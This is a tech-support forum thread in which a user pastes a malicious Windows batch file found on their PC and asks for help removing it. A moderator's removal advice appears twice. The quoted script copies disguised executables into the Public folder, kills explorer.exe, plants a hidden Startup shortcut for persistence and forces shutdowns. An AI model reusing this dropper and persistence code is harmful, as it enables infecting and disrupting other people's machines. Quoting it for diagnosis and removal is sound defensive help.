How to remove this .bat file which resets every software in my pc?

Aman Tiwari

Estimable
Oct 7, 2014
2
0
4,510
0
i'm having a problem in my pc,it seems to be a virus but no idea what it actually is,it appears as a shortcut to some existing folders* not any file ,but when i checked its properties its actually a .bat file and on opening it with notepad,there was following stuff which i saw (and to mention there are two exe apps namely"smss & taskeng" and if i click on these two the computer shuts down)-->
/*
path C:\Windows\System32
color fa
IF EXIST "C:\Users\Public\smss .exe" ( ECHO ) ELSE (taskkill /f /im explorer.exe
xcopy /h /y "smss .exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\taskeng .exe" ( ECHO ) ELSE (xcopy /h /y "taskeng .exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\Firewall.exe" ( ECHO ) ELSE (xcopy /h /y "Firewall.exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\Firewall .exe" ( ECHO ) ELSE (xcopy /h /y "Firewall .exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\explorer.exe" ( ECHO ) ELSE (xcopy /h /y "explorer.exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\explorer .exe" ( ECHO ) ELSE (xcopy /h /y "explorer .exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\Interop.IWshRuntimeLibrary.dll" ( ECHO ) ELSE (xcopy /h /y Interop.IWshRuntimeLibrary.dll "C:\Users\Public")
IF EXIST "%systemroot%\Microsoft.NET\Framework\v3.*" goto 3
IF EXIST "%systemroot%\Microsoft.NET\Framework\v4.*" goto 4
:3
IF EXIST "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Driver.lnk" (
ECHO "hur"
) ELSE (
attrib "Sound_Driver.lnk" -h -s
copy /y Sound_Driver.lnk "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
attrib "Sound_Driver.lnk" +h +s
attrib "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Driver.lnk" -h -s
shutdown /s /f /t 0
)
goto e
:4
IF EXIST "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Drivers.lnk" (
ECHO "hur"
) ELSE (
attrib "Sound_Drivers.lnk" -h -s
copy /y Sound_Drivers.lnk "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
attrib "Sound_Drivers.lnk" +h +s
attrib "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Drivers.lnk" -h -s
shutdown /s /f /t 0
)
:e
*/


Help me out people,i'm quite troubled with this thing!
 

Someone Somewhere

Dignified
Moderator
Interesting bit of coding...

I'm guessing that's a home-made bit of malware. Have you had anyone mess with your PC recently?

Boot off a Linux LiveCD/USB, delete the stuff in Publice, and delte the batch file. Then run a good antivirus, eg. Malwarebytes.

Also:
 

Someone Somewhere

Dignified
Moderator
Interesting bit of coding...

I'm guessing that's a home-made bit of malware. Have you had anyone mess with your PC recently?

Boot off a Linux LiveCD/USB, delete the stuff in Publice, and delte the batch file. Then run a good antivirus, eg. Malwarebytes.

Also:
 
Thread starter Similar threads Forum Replies Date
N Antivirus / Security / Privacy 6
arimich Antivirus / Security / Privacy 1
aafusc2988 Antivirus / Security / Privacy 11
B Antivirus / Security / Privacy 3
M Antivirus / Security / Privacy 1
A Antivirus / Security / Privacy 2
K Antivirus / Security / Privacy 8
J Antivirus / Security / Privacy 4
kikani.kautik Antivirus / Security / Privacy 13
D Antivirus / Security / Privacy 6
D Antivirus / Security / Privacy 2
E Antivirus / Security / Privacy 2
C Antivirus / Security / Privacy 1
M Antivirus / Security / Privacy 4
A Antivirus / Security / Privacy 1
K Antivirus / Security / Privacy 2
B Antivirus / Security / Privacy 5
R Antivirus / Security / Privacy 7
D Antivirus / Security / Privacy 5
M Antivirus / Security / Privacy 6

ASK THE COMMUNITY